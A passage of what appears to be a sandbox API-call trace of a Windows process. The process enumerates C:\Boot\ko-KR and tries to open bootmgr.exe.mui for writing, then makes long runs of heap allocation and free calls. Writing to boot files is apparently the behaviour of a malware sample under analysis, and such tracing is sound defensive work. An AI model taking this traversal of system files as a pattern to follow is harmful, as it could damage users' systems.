cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.991] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.991] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.991] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0165.992] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0165.992] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0165.992] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.992] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.992] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.992] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.992] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.992] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.993] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.993] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.994] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.994] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.995] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.995] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.996] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.996] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.997] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.997] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.997] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.997] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.997] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.997] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.997] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.997] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.997] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.997] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.997] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.997] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.998] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.998] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.998] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.998] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.998] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.998] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.998] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.998] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.998] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.998] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.998] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.998] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.999] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.000] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | 